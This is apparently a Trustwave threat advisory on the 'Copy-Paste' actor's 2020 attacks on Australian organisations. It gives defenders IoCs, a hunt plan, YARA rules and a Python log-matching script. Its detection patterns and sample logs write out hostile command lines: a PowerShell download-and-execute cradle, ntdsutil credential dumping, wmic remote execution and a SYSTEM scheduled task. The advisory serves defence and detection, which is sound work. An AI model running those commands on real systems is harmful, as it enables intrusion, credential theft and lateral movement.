Copy-Paste Threat Actor in the Asia Pacific Region

Summary

Australian Prime Minister Scott Morrison announced today that multiple Australian public and private organizations are being urged to safeguard their technology networks, as the country comes under a major cyber-attack. He further stated that all levels of government and the private sector are being targeted in a "sophisticated state-based" cyber-attack.

Trustwave has received the known IoCs and CVEs from the Australian Cyber Security Centre. We have commenced hunting for these IoCs throughout our global Fusion customer base. We are proactively devising new detection logic to identify behavioral elements of this threat. Any detection will be escalated and supported via our standard engagement methods.

Additional updates will be provided tomorrow. Interim advisories will be released when significant changes are tracked as they relate to this threat.

Initial analysis of the intel

The actor was identified actively using publicly available exploit code, proofs of concept, web shells and other open source offensive tools, which can be used to gain privileged access on the target system. The heavy use of pre-existing tools and exploits earned this threat actor the title of "Copy-Paste".

These tools were used against publicly facing infrastructure, primarily focusing on unpatched web services that then led to Remote Code Execution (RCE). The targeted platforms were Telerik, Microsoft IIS, SharePoint, and Citrix.

The threat actor conducted reconnaissance against the targets, identifying any unpatched services running in the environment. Where RCE was not possible, the actor used various other techniques to gain privileged access on the internet facing systems and internal machines as required.

The threat actor also used various spear-phishing campaigns on targets where the previously mentioned techniques were unsuccessful. The spear-phishing techniques included credential harvesting, emails with malicious attachments, OAuth token grabbing and email tracking services.

The threat actor actively leveraged stolen credentials and compromised legitimate Australian websites to host command and control (C2) infrastructure, in order to evade the geo-blocking defenses of target organizations and masquerade their activity as legitimate traffic.

Trustwave Actions:

  1. The Trustwave Security Operations Centre (SOC) is exercising extra vigilance in monitoring IoC-related traffic.
  2. Trustwave Managed Firewalls will have changes made to block the relevant IPs under the known bad actors (KBA) list.
  3. Trustwave will monitor cyber technology vendors and apply relevant policy updates as they are released.

Trustwave Recommendations:

Trustwave urges all customers to take appropriate actions to minimize cybersecurity risk. Below are the recommendations in reference to the observed attack. IoCs are available at the end of this post.

  1. Raise the security awareness of all staff and contractors so they can identify and report spam and phishing emails.
  2. Block the Indicators of Compromise (IoCs) in the attachment, such as IP addresses, email addresses and hash values, at whichever levels are applicable to your environment.
  3. Address the following vulnerabilities on your internal hosts, as they are being actively exploited in the wild:
    • Exploitation of Telerik UI CVE-2019-18935
    • Exploitation of Citrix Products CVE-2019-19781
    • Exploitation of Microsoft SharePoint CVE-2019-0604
  4. Review privileged accounts within your organization.
  5. Alert your internal security operations team to exercise extra vigilance.
  6. Review the ACSC Advisory and take appropriate actions relevant to your environment.
  7. Require periodic password changes and implement MFA (multi-factor authentication) where appropriate.
  8. Implement brand monitoring services to alert on the leak or sale of an organization's sensitive data.

Trustwave Hunting Strategy:

The Trustwave SpiderLabs Threat Fusion Team internally strategizes and prepares threat hunting plans for all significant global cyber events. We use this exercise to drive our hunt operations for our Managed Security clients. Based on the Australian prime minister's comments on 19 June, 2020 and the unprecedented nature of this attack, SpiderLabs is taking the extraordinary step of sharing our internal threat hunt plan for the Copy-Paste threat actor. All organisations can undertake similar operations within their own environment, or contact Trustwave about engaging a professional hunt.

Indicators of Compromise:

Important notes prior to starting the hunt:

  • The threat actor used publicly available exploit code
    • Telerik CVE-2019-18935
    • Citrix CVE-2019-19781
    • Microsoft SharePoint CVE-2019-0604
  • Spear-phishing campaign
  • Web shells
  • PowerShell reverse shell
  • PowerShell Empire
  • HTTPotato (Hot Potato)

Usage of publicly available exploit code:

  • Telerik CVE-2019-18935
    • Search for the URI "Telerik.Web.UI.WebResource.axd?type=rau"
    • Search for the files "sleep*.dll" and "rev_shell*.dll"
    • Network connections from w3wp.exe
    • YARA rules are available in the appendix
  • Citrix CVE-2019-19781
    • Search for the URI "/vpns/portal/"
      • Might contain junk code, like this: /vpns/portal/<malicious_code>
    • Look for unusual XML files (random filenames) in the filesystem locations below
      • /netscaler/portal/templates
      • /var/tmp/netscaler/portal/templates
    • Look for possible web shells
      • var/vpn/themes/admin.php
      • var/vpn/themes/default/default.php
  • Microsoft SharePoint CVE-2019-0604
    • Search for the URI "Picker.aspx?PickerDialogType=Microsoft.SharePoint" and investigate the field "ctl00$PlaceHolderDialogBodySection$ctl05$hiddenSpanData" for shellcode
    • Search for the URI "/_layouts/15/ua.aspx" (possible web shell)

Spear-Phishing Campaign:

  • Search for the file "Thesis Information to be referenced from.ppt"
  • Activity from the domains
    • mailguardonline[.]net
    • cybersecuritiesinc[.]net

Web Shells:

  • Since the attacker is using publicly available web shells from GitHub, security controls have detected them for the most part.
  • Look for the extension below in the URI
    • aspx

PowerShell Reverse Shell:

  • Search in the command line for
    • exe -exec bypass -c
    • exe -WindowStyle hidden -ExecutionPolicy Bypass
    • exe "IEX (New-Object Net.WebClient).DownloadString
  • Use the YARA rules listed below

Credential Access:

  • Use of the tools below
    • Procdump
    • Ntdsutil
      • ntdsutil "ac i ntds"

Lateral Movement:

  • Command line
    • wmic /node:* process call create -> creates a remote process
    • schtasks /create /tn * /tr * /RU System -> runs a task as the SYSTEM user
  • Look for scheduled tasks running as the SYSTEM user
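As an added example (not Trustwave's code), the following Python script applies the URI and command-line hunt strings from the sections above to constructed sample telemetry; the rule names, sample log lines, host name and IP address are my own assumptions, not indicators from the advisory.

```python
import re

# Constructed sample telemetry (not from the original post): web-server
# access log lines and endpoint process-creation command lines.
WEB_LOG = [
    '10.0.0.5 - - [19/Jun/2020:10:01:02] "POST /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1" 200',
    '10.0.0.6 - - [19/Jun/2020:10:02:11] "GET /vpns/portal/../../scripts/x.xml HTTP/1.1" 200',
    '10.0.0.7 - - [19/Jun/2020:10:03:40] "POST /_layouts/15/Picker.aspx?PickerDialogType=Microsoft.SharePoint.X HTTP/1.1" 200',
    '10.0.0.8 - - [19/Jun/2020:10:04:00] "GET /_layouts/15/ua.aspx HTTP/1.1" 200',
    '10.0.0.9 - - [19/Jun/2020:10:05:00] "GET /index.html HTTP/1.1" 200',
]
PROC_LOG = [
    'powershell.exe -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(\'http://198.51.100.1/a\')"',
    'ntdsutil "ac i ntds" "ifm" "create full C:\\temp" q q',
    'wmic /node:SRV01 process call create "cmd /c whoami"',
    'schtasks /create /tn Updater /tr C:\\x.exe /RU System /SC ONCE',
    'notepad.exe C:\\notes.txt',
]

# Each rule is (name, compiled pattern); the patterns are the hunt strings
# from the sections above, escaped for use as regular expressions.
WEB_RULES = [
    ("telerik_rau_upload", re.compile(r"Telerik\.Web\.UI\.WebResource\.axd\?type=rau", re.I)),
    ("citrix_vpns_portal", re.compile(r"/vpns/portal/", re.I)),
    ("sharepoint_picker", re.compile(r"Picker\.aspx\?PickerDialogType=Microsoft\.SharePoint", re.I)),
    ("sharepoint_ua_webshell", re.compile(r"/_layouts/15/ua\.aspx", re.I)),
]
PROC_RULES = [
    ("ps_exec_bypass", re.compile(r"-exec\s+bypass\s+-c", re.I)),
    ("ps_hidden_bypass", re.compile(r"-WindowStyle\s+hidden\s+-ExecutionPolicy\s+Bypass", re.I)),
    ("ps_iex_download", re.compile(r"IEX\s*\(New-Object\s+Net\.WebClient\)\.DownloadString", re.I)),
    ("ntdsutil_dump", re.compile(r"ntdsutil.*\bac\s+i\s+ntds\b", re.I)),
    ("wmic_remote_process", re.compile(r"wmic\s+/node:.*process\s+call\s+create", re.I)),
    ("schtasks_system", re.compile(r"schtasks\s+/create\b.*\s/RU\s+System\b", re.I)),
]

def hunt(lines, rules):
    """Return (line index, rule name) for every line that matches a rule.
    One line may match several rules (e.g. '-exec bypass' plus an IEX
    download cradle); multiple hits on one line is a useful triage signal."""
    hits = []
    for i, line in enumerate(lines):
        for name, pattern in rules:
            if pattern.search(line):
                hits.append((i, name))
    return hits
```

Feed real web-server and process-creation logs into hunt() in place of the constructed lists; matches are leads to investigate, not confirmations of compromise.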

YARA Rules:

YARA Rule for Juicypotato LPE

rule juicypotato_LPE : LPE
{
    meta:
        author = "SpiderLabs"
        group = "copy_paste"
        filetype = "exe_dll"
    strings:
        $str1 = "JuicyPotato" nocase wide ascii
        $str2 = "4991d34b-80a1-4291-83b6-3328366b9097" nocase wide ascii
        $str3 = "JuicyPotato.pdb" nocase wide ascii
        $str4 = "Waiting for auth" nocase wide ascii
    condition:
        (uint16(0) == 0x5A4D) and 3 of ($str*) and filesize < 500KB
}

YARA Rule for Juicypotato LPE_DLL

rule juicypotato_LPE_DLL : LPE
{
    meta:
        author = "SpiderLabs"
        group = "copy_paste"
        filetype = "exe_dll"
    strings:
        $str1 = "Potato.dll" nocase wide ascii
        $str2 = "VirusDeleted" nocase wide ascii
        $str3 = "Page404r" nocase wide ascii
    condition:
        (uint16(0) == 0x5A4D) and all of them and filesize < 200KB
}

YARA Rule for CVE-2019-18935 reverse_shell

rule CVE_2019_18935_reverse_shell : CVE
{
    meta:
        author = "SpiderLabs"
        group = "copy_paste"
        filetype = "exe_dll"
    strings:
        $str1 = "rev_shell_" nocase wide ascii
        $str2 = "operator<=>" nocase wide ascii
        $str3 = "operator co_await" nocase wide ascii
    condition:
        (uint16(0) == 0x5A4D) and all of them and filesize < 150KB
}

YARA Rule for malicious macros

rule macros : phishing
{
    meta:
        author = "SpiderLabs"
        group = "copy_paste"
        filetype = "macros_VBA"
    strings:
        $str1 = "\\Microsoft\\Word\\STARTUP\\Template.dotm" nocase wide ascii
        $str2 = "bin.hex" nocase wide ascii
        $str3 = "ALL = ALL0 + ALL1 + ALL2" nocase wide ascii
        $str4 = "504b" nocase wide ascii
    condition:
        all of them and filesize < 150KB
}

YARA Rule for HTTPCore PowerShell script

rule powershell_httpcore : rev_shell
{
    meta:
        author = "SpiderLabs"
        group = "copy_paste"
        filetype = "powershell_script"
    strings:
        $str1 = "HttpCore.Agent" nocase wide ascii
        $con1 = "RootPath =" nocase wide ascii
        $con2 = "RemotePassword =" nocase wide ascii
        $con3 = "RemoteLangType = " nocase wide ascii
        $con4 = "Url =" nocase wide ascii
    condition:
        $str1 and 2 of ($con*) and filesize < 150KB
}

YARA Rule for PowerShell Reverse Shell

rule powershell_rev_shell : rev_shell
{
    meta:
        author = "SpiderLabs"
        group = "copy_paste"
        filetype = "Powershell_script"
    strings:
        $str1 = "(pwd).Path" nocase wide ascii
        $con1 = "bytes = 0..65535" nocase wide ascii
        $con2 = "sendback =" nocase wide ascii
        $con3 = "sendbyte = " nocase wide ascii
        $con4 = "client =" nocase wide ascii
        $con5 = "stream =" nocase wide ascii
    condition:
        $str1 and 4 of ($con*) and filesize < 150KB
}

YARA Rule for HTTPCore backdoor

rule HTTPcore_rev_shell : rev_shell
{
    meta:
        author = "SpiderLabs"
        group = "copy_paste"
        filetype = "exe_dll"
    strings:
        $str1 = "HttpCore.dll" nocase wide ascii
        $con1 = "RootPath" nocase wide ascii
        $con2 = "RemotePassword" nocase wide ascii
        $con3 = "RemoteLangType" nocase wide ascii
        $con4 = "CurrentPassword" nocase wide ascii
    condition:
        (uint16(0) == 0x5A4D) and all of them and filesize < 150KB
}

YARA Rule for Downloader

rule Downloader
{
    meta:
        author = "SpiderLabs"
        group = "copy_paste"
        filetype = "exe_dll"
    strings:
        $str1 = "\\obj\\Release\\Library.pdb" nocase wide ascii
        $con1 = "https://api.onedrive.com/v1.0/shares/s" nocase wide ascii
        $con2 = "Microsoft SkyDriveSync" nocase wide ascii
    condition:
        (uint16(0) == 0x5A4D) and all of them and filesize < 200KB
}

YARA Rule for awen asp webshell

rule awen_asp_webshell : webshell
{
    meta:
        author = "SpiderLabs"
        group = "copy_paste"
        filetype = "aspx_webshell"
    strings:
        $str1 = "awen asp.net webshell" nocase wide ascii
        $con1 = "cmdExe_Click" nocase wide ascii
    condition:
        all of them and filesize < 100KB
}

YARA Rule for HighShell Aspx webshell

rule HighShell_aspx : webshell
{
    meta:
        author = "SpiderLabs"
        group = "copy_paste"
        filetype = "aspx_webshell"
    strings:
        $str1 = "pro"
        $str2 = "cmd"
        $str3 = "sav"
        $str4 = "vir"
        $str5 = "J3ugYdknpax1ZbHB2QILB5NS6dVa0iUD0mhhBPv0Srw="
        $str6 = {22 63 6d 64 2e 65 78 65 22 3a 70 72 6f}
    condition:
        all of them and filesize < 150KB
}
